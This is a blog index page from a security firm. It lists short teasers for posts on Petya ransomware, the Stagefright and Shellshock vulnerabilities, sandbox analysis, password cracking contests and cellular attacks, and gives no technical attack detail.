Optiv Blog

Update: Intelligence Advisory – Petya Outbreak

· By gTIC · 0 Comments

This is an update to the Intelligence Advisory: Petya Ransomware Outbreak - released June 27, 2017. Optiv’s Global Threat Intelligence Center (gTIC) received several sources pertaining to the newly created Petya ransomware strain. This new strain is being referenced as GoldenEye, Petyawrapper, NotPetya, SortaPetya, and Petna.

Continue reading 0 Shares

Stagefright: The Show Must Go On

· By Jonathan Ross · 0 Comments

Back in April, Joshua Drake at Zimperium zLabs discovered that Android carries one of the biggest flaws ever found in Google’s mobile operating system. The flaw is within Stagefright, an over-permissioned media processing mechanism that will automatically pre-load various media types received by the device. In this case, the user receives a malicious video or picture via MMS (text message) that Stagefright will process without any interaction by the user.

Continue reading 0 Shares

Diversionary Tactics 101

· By Jeff Horne · 0 Comments

When organizations are hacked or infected with malware, an important question they ask themselves is, “Who is attacking us?” Understanding an attackers profile gives your organization insight into their motives, tactics, and what they are after. The more you know about them, the more effective your strategy will be.

Continue reading 0 Shares

Improving Reliability of Sandbox Results

· By Brad Spengler · 0 Comments

Cuckoo Sandbox is an increasingly popular system for automated malware analysis. Beginning in 2010 as a Google Summer of Code project, it has quickly grown in functionality due to its easily extended open-sourced Python architecture.

Continue reading 0 Shares

Decoding IBM WebSphere Portlet URLs

· By Raffi Erganian · 0 Comments

Portlet based web applications built with the IBM Web Experience Factory, previously known as the WebSphere Portlet Factory, produce long URL's containing GZIP'd and base64-encoded data. Viewing and tampering with the data transmitted between the client browser and backing application server is quintessential to application penetration testing.

Continue reading 0 Shares

Shellshock Burp Scanning

· By Matthew Gill · 0 Comments

The following is a Java plugin for the web proxy Burp designed to detect CVE-2014-6271, or shellshock, during active scans of web applications. Further versions of the shellshock vulnerability, e.g. CVE-2014-7169, are not detected by this plugin.

Continue reading 0 Shares

Thoughts after a Month With Blackphone

· By Joshua J. Drake · 0 Comments

About a month ago, I decided to order a Blackphone. The product web site makes some tall claims about security, even calling it "A secure smartphone." This kind of proclamation is rather bold, perhaps even disingenuous, and often leads to intense scrutiny in the security community.

Continue reading 0 Shares

What is the Bash Shellshock Bug?

· By Matthew Hoy · 0 Comments

It has been discovered that vulnerability exists within the Bash command-line shell, which has been around for years, is now being actively exploited. What is being dubbed the “Shellshock” bug is a flaw that affects all Linux and UNIX operating systems including Mac OS X.

Continue reading 0 Shares

Crack Me If You Can - Hash Cracking Contest

· By Alex Kah · 0 Comments

The fifth annual Korelogic “Crack Me If You Can” contest took place this past weekend at the 22nd annual DEF CON. Crack Me If You Can (CMIYC) is an annual DEF CON contest that simulates real-world penetration testing scenarios where you might obtain large lists of hashed passwords from a client or clients. Password hashes

Continue reading 0 Shares

Cellular Exploitation on a Global Scale

· By Mathew Solnik, Marc Blanchou · 0 Comments

As a supplement to our Black Hat presentation, the below videos demonstrate cellular phone attacks to help educate the community on the seriousness of the risks.

Continue reading 0 Shares
(39 Results)